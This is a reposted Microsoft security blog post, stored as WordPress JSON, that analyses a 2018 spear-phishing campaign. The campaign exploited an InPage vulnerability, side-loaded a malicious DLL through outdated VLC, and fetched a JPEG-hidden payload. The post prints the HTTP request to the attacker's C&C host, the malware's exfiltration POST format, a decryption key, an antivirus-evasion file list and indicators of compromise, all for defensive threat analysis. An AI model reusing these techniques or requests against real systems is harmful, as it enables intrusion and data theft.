{"id":13790,"date":"2018-11-08T11:01:45","date_gmt":"2018-11-08T19:01:45","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/11\/08\/news-7557\/"},"modified":"2018-11-08T11:01:45","modified_gmt":"2018-11-08T19:01:45","slug":"news-7557","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/11\/08\/news-7557\/","title":{"rendered":"Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets"},"content":{"rendered":"<p><strong>Credit to Author: Windows Defender ATP| Date: Thu, 08 Nov 2018 18:08:13 +0000<\/strong><\/p>\n<p>Our analysis of a targeted attack that used a language-specific word processor shows why it's important to understand and protect against small-scale and localized attacks as well as broad-scale malware campaigns. The attack exploited a vulnerability in InPage, word processor software for specific languages such as Urdu, Persian, Pashto, and Arabic.<\/p>\n<p>&#10;<\/p>\n<p>More than 75% of the targets were located in Pakistan; however, the attack also found its way into some countries in Europe and the US. 
The targets included government institutions.<\/p>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-86479\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig1-geographic-distribution-of-targets.png\" alt=\"\" width=\"800\" height=\"470\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig1-geographic-distribution-of-targets.png 995w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig1-geographic-distribution-of-targets-300x176.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig1-geographic-distribution-of-targets-768x452.png 768w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig1-geographic-distribution-of-targets-330x194.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig1-geographic-distribution-of-targets-800x470.png 800w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig1-geographic-distribution-of-targets-400x235.png 400w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><em>Figure 1. Geographic distribution of targets<\/em><\/p>\n<p>&#10;<\/p>\n<p>In the past, researchers at <a href=\"https:\/\/researchcenter.paloaltonetworks.com\/2017\/11\/unit42-recent-inpage-exploits-lead-multiple-malware-families\/\">Palo Alto<\/a> and <a href=\"https:\/\/www.kaspersky.com\/blog\/inpage-exploit\/6292\/\">Kaspersky<\/a> have blogged about attacks that use malicious InPage documents. Beyond that, public research of these types of attacks has been limited.<\/p>\n<p>&#10;<\/p>\n<p>The Office 365 Research and Response team discovered this type of targeted attack in June. 
The attack was orchestrated using the following approach:<\/p>\n<p>&#10;<\/p>\n<ul>&#10;<\/p>\n<li>A spear-phishing email carrying a malicious InPage document with the file name <em>hafeez saeed speech on 22nd April.inp<\/em> was sent to the intended victims<\/li>\n<p>&#10;<\/p>\n<li>The malicious document, which contained exploit code for <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-12824\">CVE-2017-12824<\/a>, a buffer-overflow vulnerability in the InPage reader, dropped a legitimate but outdated version of VLC media player that is vulnerable to DLL hijacking<\/li>\n<p>&#10;<\/p>\n<li>The side-loaded malicious DLL called back to a command-and-control (C&amp;C) site, which triggered the download and execution of the final malware encoded in a JPEG file<\/li>\n<p>&#10;<\/p>\n<li>The final malware allowed attackers to remotely execute arbitrary commands on the compromised machine<\/li>\n<p>&#10;<\/ul>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-86482\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig2-attack-chain.png\" alt=\"\" width=\"800\" height=\"479\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig2-attack-chain.png 1000w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig2-attack-chain-300x180.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig2-attack-chain-768x460.png 768w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig2-attack-chain-330x198.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig2-attack-chain-800x479.png 800w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig2-attack-chain-400x240.png 400w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/p>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><em>Figure 2. 
Attack infection chain<\/em><\/p>\n<p>&#10;<\/p>\n<p><a href=\"https:\/\/products.office.com\/en-us\/exchange\/online-email-threat-protection?ocid=cx-blog-mmpc\">Office 365 Advanced Threat Protection<\/a> (ATP) protects customers from this attack by detecting the malicious InPage attachment in the spear-phishing emails used in the campaign. Office 365 ATP inspects email attachments and links for malicious content and provides real-time protection against attacks.<\/p>\n<p>&#10;<\/p>\n<p>Office 365 ATP leverages massive threat intelligence from different data sources and integrates signals from multiple services such as <a href=\"https:\/\/www.microsoft.com\/en-us\/windowsforbusiness\/windows-atp?ocid=cx-blog-mmpc\">Windows Defender ATP<\/a> and <a href=\"https:\/\/azure.microsoft.com\/en-us\/features\/azure-advanced-threat-protection\/\">Azure ATP<\/a>. For example, Windows Defender Antivirus detects the malicious files and documents used in this attack. Additionally, endpoint detection and response (EDR) capabilities in Windows Defender ATP detect the DLL side-loading and malicious behavior observed in this attack. Through the integration of Office 365 ATP and the rest of Microsoft security technologies in <a href=\"https:\/\/techcommunity.microsoft.com\/t5\/Security-Privacy-and-Compliance\/Announcing-Microsoft-Threat-Protection\/ba-p\/262783\">Microsoft Threat Protection<\/a>, detection and remediation are orchestrated across our solutions.<\/p>\n<p>&#10;<\/p>\n<h2>Entry point: Malicious InPage document<\/h2>\n<p>&#10;<\/p>\n<p>An email with a malicious InPage lure document attached was sent to select targets. The document exploits CVE-2017-12824, a vulnerability in InPage that allows arbitrary code execution. When the malicious InPage document is opened, it executes shellcode that decrypts and executes an embedded malicious DLL file. 
The decryption routine is a simple XOR function that uses the key <em>&#8220;27729984h&#8221;<\/em>.<\/p>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-86485\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig3-first-dll-decryption-function.png\" alt=\"\" width=\"690\" height=\"481\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig3-first-dll-decryption-function.png 690w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig3-first-dll-decryption-function-300x209.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig3-first-dll-decryption-function-330x230.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig3-first-dll-decryption-function-400x279.png 400w\" sizes=\"auto, (max-width: 690px) 100vw, 690px\" \/><em>Figure 3. First DLL decryption function<\/em><\/p>\n<p>&#10;<\/p>\n<h2>Stage 1: DLL side-loading and C&amp;C communication<\/h2>\n<p>&#10;<\/p>\n<p>The decrypted malicious DLL contains two files embedded in the PE resources section. The first resource file is named <em>200<\/em>, which is a legitimate version of VLC media player (Product Version: 2.2.1.0, File Version: 2.2.1). The second file in the resources section is named <em>400<\/em>, which is a DLL hijacker that impersonates the legitimate file <em>Libvlc.dll<\/em>.<\/p>\n<p>&#10;<\/p>\n<p>When run, the stage 1 malware drops both the VLC media player executable and the malicious <em>Libvlc.dll<\/em> in the <em>%TEMP%<\/em> folder, and then runs the VLC media player process.<\/p>\n<p>&#10;<\/p>\n<p>The vulnerable VLC media player process searches for the dropped file <em>Libvlc.dll<\/em> in the directory from which it was loaded. 
It subsequently picks up and loads the malicious DLL and executes its malicious function.<\/p>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-86488\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig4-functions-exported-by-malicious-libvlc-dll.png\" alt=\"\" width=\"499\" height=\"276\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig4-functions-exported-by-malicious-libvlc-dll.png 499w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig4-functions-exported-by-malicious-libvlc-dll-300x166.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig4-functions-exported-by-malicious-libvlc-dll-330x183.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig4-functions-exported-by-malicious-libvlc-dll-400x221.png 400w\" sizes=\"auto, (max-width: 499px) 100vw, 499px\" \/><em>Figure 4. Functions exported by the malicious Libvlc.dll<\/em><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-86491\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig5-functions-imported-from-libvlc-dll.png\" alt=\"\" width=\"665\" height=\"352\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig5-functions-imported-from-libvlc-dll.png 665w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig5-functions-imported-from-libvlc-dll-300x159.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig5-functions-imported-from-libvlc-dll-330x175.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig5-functions-imported-from-libvlc-dll-400x212.png 400w\" sizes=\"auto, (max-width: 665px) 100vw, 665px\" \/><em>Figure 5. 
Functions imported from Libvlc.dll by the VLC media player process<\/em><\/p>\n<p>&#10;<\/p>\n<p>The most interesting malicious code in Libvlc.dll is in the function <em>libvlc_wait()<\/em>. The malicious code dynamically resolves the API calls it needs to connect to the attacker C&amp;C server and download a JPEG file. If the C&amp;C server is not reachable, the malware calls the API <em>sleep()<\/em> for five seconds and then attempts to call back the attacker domain again.<\/p>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-86494\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig6-cnc-callback-in-malicious-function.png\" alt=\"\" width=\"496\" height=\"348\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig6-cnc-callback-in-malicious-function.png 496w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig6-cnc-callback-in-malicious-function-300x210.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig6-cnc-callback-in-malicious-function-330x232.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig6-cnc-callback-in-malicious-function-400x281.png 400w\" sizes=\"auto, (max-width: 496px) 100vw, 496px\" \/><em>Figure 6. C&amp;C callback in malicious function libvlc_wait()<\/em><\/p>\n<p>&#10;<\/p>\n<p>If the JPEG file, <em>logo.jpg<\/em>, is successfully downloaded, the malicious code in <em>libvlc_wait()<\/em> skips the first 20 bytes of the JPEG file and creates a thread to execute the embedded payload. 
The code in the JPEG file is encoded using <em>Shikata ga nai<\/em>, a custom polymorphic shellcode encoder\/decoder.<\/p>\n<p>&#10;<\/p>\n<p>Below is an example of the HTTP request sent to the C&amp;C to download the malicious file <em>logo.jpg<\/em>.<\/p>\n<p>&#10;<\/p>\n<pre>GET \/assets\/vnc\/logo.jpg HTTP\/1.1&#13;&#10;Accept: *\/*&#13;&#10;Host: useraccount.co&#13;&#10;&#13;&#10;HTTP\/1.1 200 OK&#13;&#10;Date: Mon, 09 Jul 2018 13:45:49 GMT&#13;&#10;Server: Apache\/2.4.33 (cPanel) OpenSSL\/1.0.2o mod_bwlimited\/1.4 Phusion_Passenger\/5.1.12&#13;&#10;Upgrade: h2,h2c&#13;&#10;Connection: Upgrade&#13;&#10;Last-Modified: Mon, 09 Apr 2018 07:19:20 GMT&#13;&#10;ETag: \"26e0378-2086b-56965397b5c31\"&#13;&#10;Accept-Ranges: bytes&#13;&#10;Content-Length: 133227&#13;&#10;Content-Type: image\/jpeg<\/pre>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><em>Figure 7. HTTP GET request used to download the JPEG file<\/em><\/p>\n<p>&#10;<\/p>\n<p>The historical Whois record indicated that the C&amp;C server domain was registered on March 20, 2018.<\/p>\n<p>&#10;<\/p>\n<pre>Domain Name: useraccount.co&#13;&#10;Registry Domain ID: D2169366F46A14BCD9EB42AF48BEA813C-NSR&#13;&#10;Registrar WHOIS Server:&#13;&#10;Registrar URL: whois.publicdomainregistry.com&#13;&#10;Updated Date: 2018-03-20T14:04:40Z&#13;&#10;Creation Date: 2018-03-20T14:04:40Z&#13;&#10;Registry Expiry Date: 2019-03-20T14:04:40Z&#13;&#10;Domain Status: clientTransferProhibited https:\/\/icann.org\/epp#clientTransferProhibited&#13;&#10;Domain Status: addPeriod https:\/\/icann.org\/epp#addPeriod<\/pre>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><em>Figure 8. Whois record for the attacker C&amp;C server.<\/em><\/p>\n<p>&#10;<\/p>\n<p>The shellcode in the JPEG file uses multiple layers of polymorphic XOR routines to decrypt the final payload. 
After successfully decrypting the payload, it drops and executes the final DLL malware <em>aflup64.dll<\/em> in the folder <em>%ProgramData%Dell64<\/em>.<\/p>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-86503\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig9-first-29-bytes-jpeg.png\" alt=\"\" width=\"574\" height=\"203\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig9-first-29-bytes-jpeg.png 574w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig9-first-29-bytes-jpeg-300x106.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig9-first-29-bytes-jpeg-330x117.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig9-first-29-bytes-jpeg-400x141.png 400w\" sizes=\"auto, (max-width: 574px) 100vw, 574px\" \/><br \/>&#10;<em>Figure 9. The first 29 Bytes of the JPEG file after the header make up the first decryption layer<\/em><\/p>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-86506\" src=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig10-valid-jpeg-header-followed-by-malicious-code.png\" alt=\"\" width=\"624\" height=\"185\" srcset=\"https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig10-valid-jpeg-header-followed-by-malicious-code.png 624w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig10-valid-jpeg-header-followed-by-malicious-code-300x89.png 300w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig10-valid-jpeg-header-followed-by-malicious-code-330x98.png 330w, https:\/\/cloudblogs.microsoft.com\/uploads\/prod\/sites\/13\/2018\/11\/fig10-valid-jpeg-header-followed-by-malicious-code-400x119.png 400w\" sizes=\"auto, (max-width: 624px) 100vw, 
624px\" \/><em>Figure 10. Valid JPEG file header followed by encrypted malicious code<\/em><\/p>\n<p>&#10;<\/p>\n<h2>Stage 2: System reconnaissance and executing attacker commands<\/h2>\n<p>&#10;<\/p>\n<p>The final stage malware maintains persistence using different methods. For example, the malicious function <em>IntRun()<\/em> can load and execute the malware DLL. It also uses the registry key <em>CurrentVersionRun<\/em> to maintain persistence.<\/p>\n<p>&#10;<\/p>\n<p>The malware's capabilities include:<\/p>\n<p>&#10;<\/p>\n<ul>&#10;<\/p>\n<li>System reconnaissance&#10;\n<ul>&#10;<\/p>\n<li>List computer names, Windows version, Machine ID, running processes, and loaded modules<\/li>\n<p>&#10;<\/p>\n<li>List system files and directories<\/li>\n<p>&#10;<\/p>\n<li>List network configuration<\/li>\n<p>&#10;<\/ul>\n<p>&#10;<\/li>\n<p>&#10;<\/p>\n<li>Execute attacker commands<\/li>\n<p>&#10;<\/p>\n<li>Evade certain sandboxes or antivirus products<\/li>\n<p>&#10;<\/ul>\n<p>&#10;<\/p>\n<p>Collected information or responses to commands are sent back to the attacker domain via an HTTP POST request. The request has a custom multipart boundary that always starts with the same 37 hardcoded alphanumeric characters.<\/p>\n<p>&#10;<\/p>\n<pre>---------------------n9mc4jh3ft7327hfg78kb41b861ft18bhfb91&#13;&#10;Content-Disposition: form-data; name=\"id\";&#13;&#10;Content-Type: text\/plain&#13;&#10;&lt;Base64 Data Blob&gt;<\/pre>\n<p>&#10;<\/p>\n<p style=\"text-align: center\"><em>Figure 11. Sample of malware POST request<\/em><\/p>\n<p>&#10;<\/p>\n<p>The malware also has a list of hardcoded file names of security products and sandbox solutions. 
If any of these files are present on a machine the malware attempts to infect, it exits:<\/p>\n<p>&#10;<\/p>\n<ul>&#10;<\/p>\n<li><em>avgnt.exe<\/em><\/li>\n<p>&#10;<\/p>\n<li><em>avp.exe<\/em><\/li>\n<p>&#10;<\/p>\n<li><em>egui.exe<\/em><\/li>\n<p>&#10;<\/p>\n<li><em>Sbie.dll<\/em><\/li>\n<p>&#10;<\/p>\n<li><em>VxKernelSvcNT.log<\/em><\/li>\n<p>&#10;<\/ul>\n<p>&#10;<\/p>\n<h2>Detecting targeted attacks with Office 365 ATP and Windows Defender ATP<\/h2>\n<p>&#10;<\/p>\n<p>Historically, malware payloads like the stage 2 malware in this attack are used to steal credentials and other sensitive information, install more payloads, or move laterally in the network. However, because the malware opens a backdoor channel for remote attackers to execute arbitrary commands of their choice, there's a wide range of possibilities.<\/p>\n<p>&#10;<\/p>\n<p>Enterprises can protect themselves from targeted attacks using <a href=\"https:\/\/products.office.com\/en-us\/exchange\/online-email-threat-protection?ocid=cx-blog-mmpc\">Office 365 Advanced Threat Protection<\/a>, which blocks threats based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files, leveraging sandboxing and time-of-click protection. Recent <a href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/10\/17\/how-office-365-learned-to-reel-in-phish\/\">enhancements in anti-phishing capabilities<\/a> in Office 365 address impersonation, spoofing, phishing content, and internal phishing emails sent from compromised accounts. 
If you are not already secured against advanced cyberthreat campaigns via email, <strong><a href=\"https:\/\/portal.office.com\/signup\/logout?OfferId=101bde18-5ffb-4d79-a47b-f5b2c62525b3&amp;dl=ENTERPRISEPREMIUM&amp;culture=en-US&amp;country=US\">begin a free Office 365 E5 trial<\/a><\/strong> today.<\/p>\n<p>&#10;<\/p>\n<p>In addition, enterprises can use <a href=\"https:\/\/www.microsoft.com\/en-us\/windowsforbusiness\/windows-atp?ocid=cx-blog-mmpc\">Windows Defender Advanced Threat Protection<\/a>, which provides a unified endpoint security platform for intelligent protection, detection, investigation, and response. Exploit protection, attack surface reduction rules, hardware-based isolation, controlled folder access, and network protection <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/security\/threat-protection\/windows-defender-atp\/overview-attack-surface-reduction\">reduce the attack surface<\/a>. <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/security\/threat-protection\/windows-defender-antivirus\/windows-defender-antivirus-in-windows-10\">Windows Defender Antivirus<\/a> detects and blocks the malicious documents and files used in this campaign. Windows Defender ATP's <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/security\/threat-protection\/windows-defender-atp\/overview-endpoint-detection-response\">endpoint detection and response<\/a>, <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/security\/threat-protection\/windows-defender-atp\/automated-investigations-windows-defender-advanced-threat-protection\">automated investigation and remediation<\/a>, and <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/security\/threat-protection\/windows-defender-atp\/overview-hunting-windows-defender-advanced-threat-protection\">advanced hunting<\/a> capabilities empower security operations personnel to detect and stop attacks in enterprise networks. 
To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, <strong><a href=\"https:\/\/www.microsoft.com\/en-us\/windowsforbusiness\/windows-atp?ocid=cx-blog-mmpc\">sign up for a free Windows Defender ATP trial<\/a><\/strong>.<\/p>\n<p>&#10;<\/p>\n<p>These two services integrate with the rest of Microsoft's security technologies as part of Microsoft Threat Protection, an integrated solution providing security for the modern workplace across identities, endpoints, user data, cloud apps, and infrastructure. <a href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/09\/24\/delivering-security-innovation-that-puts-microsofts-experience-to-work-for-you\/\">Cybersecurity is the central challenge of our digital age<\/a>, and Microsoft doesn't stop innovating to provide industry-best integrated security. For more information, read the blog post <a href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/09\/24\/delivering-security-innovation-that-puts-microsofts-experience-to-work-for-you\/\">Delivering security innovation that puts Microsoft's experience to work for you<\/a>.<\/p>\n<p>&#10;<\/p>\n<p><em><strong>Ahmed Shosha<\/strong> and <strong>Abhijeet Hatekar<\/strong><\/em><br \/>&#10;<em>Microsoft Threat Intelligence Center<\/em><\/p>\n<p>&#10;<\/p>\n<h3>Indicators of Compromise (IoCs)<\/h3>\n<p>&#10;<\/p>\n<p>URLs<br \/>&#10;hxxp:\/\/useraccount[.]co\/assets\/vnc\/logo[.]jpg<br \/>&#10;hxxp:\/\/useraccount[.]co\/assets\/vnc\/rest[.]php<br \/>&#10;hxxp:\/\/useraccount[.]co\/assets\/kvx\/success[.]txt<br \/>&#10;hxxp:\/\/useraccount[.]co\/assets\/pqs\/rest[.]php<\/p>\n<p>&#10;<\/p>\n<p>Files (SHA-256)<br \/>&#10;013417bd5465d6362cd43c70015c7a74a1b8979785b842b7cfa543cb85985852 (INP File)<br 
\/>&#10;9ffb61f1360595fc707053620f3751cb76c83e67835a915ccd3cbff13cf97bed (EXE)<br \/>&#10;019b8a0d3f9c9c07103f82599294688b927fbbbdec7f55d853106e52cf492c2b (DLL)<\/p>\n<p>&#10;<\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/11\/08\/attack-uses-malicious-inpage-document-and-outdated-vlc-media-player-to-give-attackers-backdoor-access-to-targets\/\">Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\">Microsoft Secure<\/a>.<\/p>\n<p><a href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/11\/08\/attack-uses-malicious-inpage-document-and-outdated-vlc-media-player-to-give-attackers-backdoor-access-to-targets\/\" target=\"bwo\" >https:\/\/blogs.technet.microsoft.com\/mmpc\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Windows Defender ATP| Date: Thu, 08 Nov 2018 18:08:13 +0000<\/strong><\/p>\n<p>Our analysis of a targeted attack that used a language-specific word processor shows why its important to understand and protect against small-scale and localized attacks as well as broad-scale malware campaigns. The attack exploited a vulnerability in InPage, a word processor software for specific languages like Urdu, Persian, Pashto, and Arabic. 
More than 75% of <\/p>\n<p><a class=\"read-more\" title=\"Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets\" aria-label=\"Read more about Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets\" href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/11\/08\/attack-uses-malicious-inpage-document-and-outdated-vlc-media-player-to-give-attackers-backdoor-access-to-targets\/\">Read more<\/a><\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/11\/08\/attack-uses-malicious-inpage-document-and-outdated-vlc-media-player-to-give-attackers-backdoor-access-to-targets\/\">Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/cloudblogs.microsoft.com\/microsoftsecure\">Microsoft Secure<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10759,10378],"tags":[20095,4500,20096,18372,12191,10865,17194],"class_list":["post-13790","post","type-post","status-publish","format-standard","hentry","category-microsoft","category-security","tag-cve-2017-12842","tag-cybersecurity","tag-inpage","tag-office-365-atp","tag-targeted-attacks","tag-windows-defender-atp","tag-windows-defender-av"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13790","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.ph
p\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13790"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13790\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13790"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13790"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13790"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}